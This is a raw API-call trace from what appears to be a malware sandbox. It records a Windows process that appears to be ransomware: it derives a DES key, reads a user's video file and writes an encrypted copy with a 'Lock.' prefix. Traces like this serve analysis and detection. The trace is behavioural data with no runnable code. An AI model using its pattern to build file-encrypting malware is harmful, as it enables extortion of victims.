PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.396] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.396] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.396] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.396] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.396] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.396] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.396] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.396] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0212.396] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.396] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0212.396] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.396] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.396] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.396] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0212.396] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aab548, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0212.396] CryptDeriveKey (in: hProv=0xa7c660, Algid=0x6601, hBaseData=0x9e2138, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e2078) returned 1 [0212.396] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.396] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.396] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.396] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.396] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.396] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.397] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.397] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0212.397] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.397] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0212.397] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0212.397] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0212.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f70a0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0212.397] CryptDestroyHash (hHash=0x9e2138) returned 1 [0212.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3866c48 [0212.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d28 [0212.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c58 [0212.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0212.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0212.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab878 [0212.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0212.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0212.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7e8 [0212.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0212.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ca8 [0212.397] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ce8 [0212.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab518 [0212.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0212.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cf8 [0212.398] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0212.398] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.398] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.398] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71be8 [0212.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafd8 [0212.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0212.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0212.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0212.398] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos/dbFeToW6SZRYrK03.flv" (normalized: "c:\\users\\fd1hvy\\videos\\dbfetow6szryrk03.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4f4 [0212.399] SetFilePointerEx (in: hFile=0x4f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.399] SetFilePointerEx (in: hFile=0x4f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0212.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f71e0 [0212.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0212.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0212.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2d8 | out: hHeap=0x2af0000) returned 1 [0212.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafd8 | out: hHeap=0x2af0000) returned 1 [0212.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0212.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0212.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0212.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0212.400] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0212.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0212.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0212.400] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0212.400] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0212.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafd8 [0212.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0212.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0212.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0212.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0212.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0212.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0212.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0212.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab188 [0212.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0212.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0212.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0212.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0212.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0212.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0212.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0212.401] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2f0 [0212.401] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0212.401] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74a50 [0212.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2f0 | out: hHeap=0x2af0000) returned 1 [0212.401] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos/" (normalized: "c:\\users\\fd1hvy\\videos")) returned 0x11 [0212.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74a50 | out: hHeap=0x2af0000) returned 1 [0212.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0212.401] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0212.401] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a130 [0212.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab320 [0212.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0212.402] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos/Lock.dbFeToW6SZRYrK03.flv" (normalized: "c:\\users\\fd1hvy\\videos\\lock.dbfetow6szryrk03.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x504 [0212.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7180 [0212.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0212.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0212.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0212.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafd8 | out: hHeap=0x2af0000) returned 1 [0212.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0212.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0212.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0212.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0212.404] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0212.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0212.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0212.404] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0212.404] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0212.404] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0212.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0212.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0212.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0212.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0212.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0212.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0212.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0212.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafd8 [0212.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0212.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0212.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0212.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0212.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafd8 | out: hHeap=0x2af0000) returned 1 [0212.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0212.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c18 [0212.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7220 [0212.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0212.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafd8 [0212.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0212.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0212.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0212.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0212.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafd8 | out: hHeap=0x2af0000) returned 1 [0212.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0212.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7220 | out: hHeap=0x2af0000) returned 1 [0212.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0212.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0212.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafd8 [0212.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0212.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0212.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x50eb020 [0212.408] SetFilePointerEx (in: hFile=0x4f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0212.408] ReadFile (in: hFile=0x4f4, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0212.410] ReadFile (in: hFile=0x4f4, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x770b, lpOverlapped=0x0) returned 1 [0212.411] ReadFile (in: hFile=0x4f4, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0212.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0212.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0212.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafd8 | out: hHeap=0x2af0000) returned 1 [0212.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0212.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1770b) returned 0x2a8a138 [0212.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50eb020 | out: hHeap=0x2af0000) returned 1 [0212.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0212.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0212.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0212.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0212.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1e8 | out: hHeap=0x2af0000) returned 1 [0212.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0212.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1a0 | out: hHeap=0x2af0000) returned 1 [0212.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0212.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1770b) returned 0x2aae878 [0212.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a8a138 | out: hHeap=0x2af0000) returned 1 [0212.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0212.418] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.418] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0212.418] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0212.418] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab158 [0212.418] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0212.418] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d88 [0212.418] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1770b) returned 0x2ac5f90 [0212.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0212.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2ac5f90 | out: hHeap=0x2af0000) returned 1 [0212.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0212.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0212.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0212.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0212.420] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.420] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0212.420] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0212.420] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f80 [0212.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f80 | out: hHeap=0x2af0000) returned 1 [0212.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0212.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0212.420] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0212.420] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.420] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0212.420] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0212.420] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0212.420] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0212.420] HeapFree (in: hHeap=0x2af0000, 